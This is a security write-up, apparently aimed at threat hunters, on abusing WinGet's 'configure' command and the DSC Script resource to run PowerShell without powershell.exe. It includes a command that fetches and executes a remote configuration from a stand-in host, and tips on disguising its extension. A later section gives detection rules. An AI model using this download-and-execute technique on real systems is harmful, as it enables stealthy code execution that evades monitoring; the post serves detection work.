I. Introduction
In this article, I will provide a brief overview of the Windows Package Manager - WinGet. Following that, I will demonstrate how to use WinGet as an intermediary for executing living-off-the-land PowerShell scripts without ever launching powershell.exe.
I hope the information provided during the Proof of Concept (POC) demo will help threat hunters extend their rules for monitoring fileless attack techniques.
II. Detailed explanation
1. Some basic information
A. What is WinGet?
WinGet is a command-line tool created by Microsoft to facilitate the management of applications on Windows systems. It's designed to streamline the process of installing, upgrading, configuring, and removing software. The tool is part of the broader Windows Package Manager platform and aims to make the software management experience more efficient and user-friendly.
It's similar to package managers commonly used in Linux environments.
WinGet ships with Windows 10 (version 1709, build 16299, or later), Windows 11, and Windows Server 2025, so you won't need to install anything to use this LoLBin. Note that the "configure" command used below is only present in recent releases of winget (1.6, from late 2023, or newer), so an older App Installer package may need to be updated first.
B. Analyze the execution flow of WinGet
Below are the execution parameters of WinGet.
I will delve into the analysis of the "configure" parameter.
The WinGet configure command applies configuration settings to your Windows system based on a specified configuration file. This lets you automate the setup and configuration of applications and system settings, making it easier to standardize environments or replicate settings across multiple machines.
According to the documentation, the "configure" command accepts a WinGet Configuration file and makes the configuration changes specified within it. These configuration files are YAML-formatted.
If you want to learn more in detail, Microsoft also provides several sample configuration files.
From the sample files provided by Microsoft, I created a simplified file as follows.
(Figure: YAML file that changes Explorer settings)
You can test it yourself with the example file: Test-cfg.yaml
This file will adjust some configurations of Windows Explorer: File Extensions, Hidden Files, Item CheckBoxes, and restart Explorer.
To use the "configure" function, first enable it once by running winget configure --enable.
Then, provide WinGet with the configuration file just created:
winget configure -f "C:\Samples\winget\Test-cfg.yaml" --accept-configuration-agreements
Information about the parameters:
- -f: the path to the location of the configuration file in YAML format.
- --accept-configuration-agreements: Accepts the configuration warning, preventing an interactive prompt. This will be more convenient when you need to run the command as part of a script file.
After running, the results will be printed to the console.
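As an added example (not the author's Test-cfg.yaml, which the post does not reproduce), the following PowerShell writes an equivalent configuration that uses the WindowsExplorer resource from Microsoft's Microsoft.Windows.Developer DSC module and then applies it with the two commands above. The resource and setting names follow Microsoft's published sample configurations; the scratch path under $env:TEMP and the final registry check are assumptions added for illustration.

```powershell
# Added example, not the post's own file. Writes a WinGet configuration that
# changes the three Explorer settings described above, then applies it.
$cfg = @'
# yaml-language-server: $schema=https://aka.ms/configuration-dsc-schema/0.2
properties:
  configurationVersion: 0.2.0
  resources:
    - resource: Microsoft.Windows.Developer/WindowsExplorer
      id: ExplorerSettings
      directives:
        description: Show file extensions, hidden files and item check boxes
        allowPrerelease: true   # required while the module is published as a prerelease
      settings:
        FileExtensions: Show
        HiddenFiles: Show
        ItemCheckBoxes: Show
        RestartExplorer: true
'@

# Assumption: a scratch location; the post used C:\Samples\winget\Test-cfg.yaml
$path = Join-Path $env:TEMP 'Test-cfg.yaml'
Set-Content -Path $path -Value $cfg -Encoding utf8

# Step 1 (one time only): enable the configure feature.
winget configure --enable

# Step 2: apply the file; the flag suppresses the interactive agreement prompt.
winget configure -f $path --accept-configuration-agreements

# The settings are backed by Explorer's "Advanced" key: after a successful run
# HideFileExt should be 0, Hidden 1 and AutoCheckSelect 1.
Get-ItemProperty 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced' |
    Select-Object HideFileExt, Hidden, AutoCheckSelect
```

The registry query at the end is the quickest way to confirm that the change was made by ConfigurationRemotingServer.exe on your behalf, and it is the same key a registry-monitoring rule would watch.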
The execution flow of WinGet creates the following processes.
WinGet will run the program "ConfigurationRemotingServer.exe".
“ConfigurationRemotingServer.exe” will parse and execute the configuration requests contained in the received YAML file.
By monitoring the Registry, we will observe that the corresponding Values in the Explorer Key are being modified.
2. Use WinGet to execute a PowerShell script
A. Use local YAML file
WinGet uses PowerShell Desired State Configuration (DSC) resources to automate the configuration of the Windows operating system.
Among them, the resource "Script" catches my attention the most.
“The Script resource enables you to write PowerShell code to get, test, and set a resource when a specific DSC resource isn't available. You must provide the code for these methods, handle all dependencies, and ensure your code is idempotent.”
After reviewing examples of how to create a YAML configuration file with the correct syntax, I was able to create a simple file as follows.
You can download the file via the following link: SimplePSScript.yaml
WinGet will execute some PowerShell commands and log them into a log file. I use the method of logging to a file because when executed successfully, the results will not be displayed in the console.
WinGet downloads the DSC resource module from the PowerShell Gallery if it is not already present on the machine; setting "allowPrerelease" to "true" additionally permits a prerelease version of that module to be installed.
The DSC Resources will be stored in the path: "%LOCALAPPDATA%\Microsoft\WinGet\Configuration\Modules".
I will run with the configuration file above as follows.
winget configure --accept-configuration-agreements --disable-interactivity -f "C:\Samples\winget\SimplePSScript.yaml"
In the above command, "--accept-configuration-agreements" and "--disable-interactivity" will help eliminate interruptions during execution that require waiting for input.
By checking the log file, we will obtain the results of the two commands "Get-Host" and "Get-ExecutionPolicy".
The host information in the log tells us that WinGet hosts the PowerShell engine in-process through the System.Management.Automation assembly (the PowerShell SDK) rather than spawning powershell.exe or pwsh.exe.
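As an added example (not the author's SimplePSScript.yaml), here is a configuration that drives the DSC Script resource to run inline PowerShell and, like the post's file, writes its results to a log because nothing is echoed to the console. The post does not name the module that provides the Script resource; PSDscResources is assumed here. The log path under $env:TEMP is also an assumption.

```powershell
# Added example, not the post's own file. The Script resource lets the YAML
# carry arbitrary PowerShell that ConfigurationRemotingServer.exe executes.
$cfg = @'
# yaml-language-server: $schema=https://aka.ms/configuration-dsc-schema/0.2
properties:
  configurationVersion: 0.2.0
  resources:
    - resource: PSDscResources/Script   # assumption: module providing the Script resource
      id: RunInlinePowerShell
      directives:
        description: Execute inline PowerShell through the DSC Script resource
        allowPrerelease: true
      settings:
        GetScript: |
          @{ Result = (Test-Path (Join-Path $env:TEMP 'winget-dsc.log')) }
        TestScript: |
          # Always report "not in desired state" so SetScript runs on every apply.
          $false
        SetScript: |
          $log = Join-Path $env:TEMP 'winget-dsc.log'
          "Host: $((Get-Host).Name)"                   | Out-File $log
          "PSVersion: $($PSVersionTable.PSVersion)"    | Out-File $log -Append
          "ExecutionPolicy: $(Get-ExecutionPolicy)"    | Out-File $log -Append
          # Which binary is really running this script? Compare with the process tree.
          "Process: $([Diagnostics.Process]::GetCurrentProcess().ProcessName)" | Out-File $log -Append
'@

$path = Join-Path $env:TEMP 'SimplePSScript.yaml'   # assumption: scratch location
Set-Content -Path $path -Value $cfg -Encoding utf8

# Both flags remove prompts so the command can run unattended from a script.
winget configure --accept-configuration-agreements --disable-interactivity -f $path

# Read back what the hosted engine recorded.
Get-Content (Join-Path $env:TEMP 'winget-dsc.log')
```

The Process line is the most useful one for a hunter: it names the executable that actually hosted the script, which is the process the post's tree shows (ConfigurationRemotingServer.exe) rather than powershell.exe. Note that DSC expects TestScript to be idempotent; returning $false unconditionally is deliberate here so that SetScript fires on every run.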
B. Use remote YAML file
Having to copy the configuration file onto the target machine before each run is inconvenient. If WinGet could download and execute it automatically, the technique would be more convenient and would leave fewer artifacts on disk.
And fortunately, WinGet also accepts a web link as a YAML configuration file.
I will change the command used in the previous section to the following:
winget configure --accept-configuration-agreements --disable-interactivity -f https://simplehost.demo/ps-script.txt
Winget will automatically download the configuration file to its web cache folder. It will then execute this configuration file.
You can see that the file extension doesn't necessarily have to be .yaml. You can use file extensions like .txt or .jpg to blend into the background.
And of course, since the script runs inside the PowerShell engine (System.Management.Automation), the engine still submits the script content to the Antimalware Scan Interface (AMSI) before execution, so an AMSI-aware AV product will see it even though powershell.exe is never started.
III. Conclusion
The creators of fileless malware are always searching for and using living-off-the-land binaries (lolbins) to fly under the radar on the victims' systems.
Fileless attacks are becoming increasingly common and sophisticated, which requires us to continuously supplement our monitoring and detection techniques and methods.
Winget is a tool available on Windows, intended to facilitate software management. However, it can also be abused to execute PowerShell code without using powershell.exe, a program that is typically closely monitored.
Winget uses configuration files in YAML format, and these files can not only be read from the local drive but can also be directly retrieved from the Internet.
As a threat hunter, you should keep an eye on Winget and its child processes (ConfigurationRemotingServer.exe), along with the event logs from AMSI.
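As an added example (not part of the original post), the following hunting filter encodes the indicators described above: ConfigurationRemotingServer.exe being spawned, and winget.exe invoked with "configure" pointing at a URL, a non-YAML extension, or the non-interactive flags. It runs over constructed process-creation events whose field names mirror Sysmon Event ID 1 (Image, ParentImage, CommandLine); the sample paths and command lines are made up for the demo, and a real deployment would feed it from Get-WinEvent or a SIEM instead.

```powershell
# Added example: flag the winget "configure" execution chain in process-creation
# telemetry. Field names follow Sysmon Event ID 1; adapt for Security 4688.
function Test-WinGetConfigureAbuse {
    param([Parameter(Mandatory, ValueFromPipeline)] [pscustomobject] $Event)
    process {
        $image  = ($Event.Image       -split '[\\/]')[-1]
        $parent = ($Event.ParentImage -split '[\\/]')[-1]
        $cmd    = $Event.CommandLine
        $reasons = [System.Collections.Generic.List[string]]::new()

        # The DSC host the post identifies as winget's child.
        if ($image -ieq 'ConfigurationRemotingServer.exe') {
            $reasons.Add("DSC configuration host spawned by $parent")
        }

        if ($image -ieq 'winget.exe' -and $cmd -imatch '\bconfigure\b') {
            if ($cmd -imatch '(^|\s)(-f|--file)\s+["'']?https?://') {
                $reasons.Add('configuration file fetched from a URL')
            }
            if ($cmd -imatch '(^|\s)(-f|--file)\s+\S+\.(txt|jpe?g|png|gif)\b') {
                $reasons.Add('configuration file with a non-YAML extension')
            }
            if ($cmd -imatch '--disable-interactivity|--accept-configuration-agreements') {
                $reasons.Add('non-interactive flags typical of scripted use')
            }
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Image       = $image
                Parent      = $parent
                CommandLine = $cmd
                Reasons     = ($reasons -join '; ')
            }
        }
    }
}

# Constructed sample events (not real telemetry); paths are illustrative.
$sample = @(
    [pscustomobject]@{
        Image       = 'C:\Users\demo\AppData\Local\Microsoft\WindowsApps\winget.exe'
        ParentImage = 'C:\Windows\System32\cmd.exe'
        CommandLine = 'winget configure --accept-configuration-agreements --disable-interactivity -f https://simplehost.demo/ps-script.txt'
    }
    [pscustomobject]@{
        Image       = 'C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_x64\ConfigurationRemotingServer.exe'
        ParentImage = 'C:\Users\demo\AppData\Local\Microsoft\WindowsApps\winget.exe'
        CommandLine = 'ConfigurationRemotingServer.exe'
    }
    [pscustomobject]@{   # benign baseline: a normal package install should not fire
        Image       = 'C:\Users\demo\AppData\Local\Microsoft\WindowsApps\winget.exe'
        ParentImage = 'C:\Windows\System32\WindowsTerminal.exe'
        CommandLine = 'winget install --id Git.Git -e'
    }
)

$sample | Test-WinGetConfigureAbuse | Format-Table -AutoSize
```

The third sample event is there to show that ordinary winget usage stays quiet; only the configure path and its child process are surfaced. Pair this with a file-creation rule on %LOCALAPPDATA%\Microsoft\WinGet\Configuration\Modules, where the downloaded DSC modules land, to catch first-time use of the Script resource on a host.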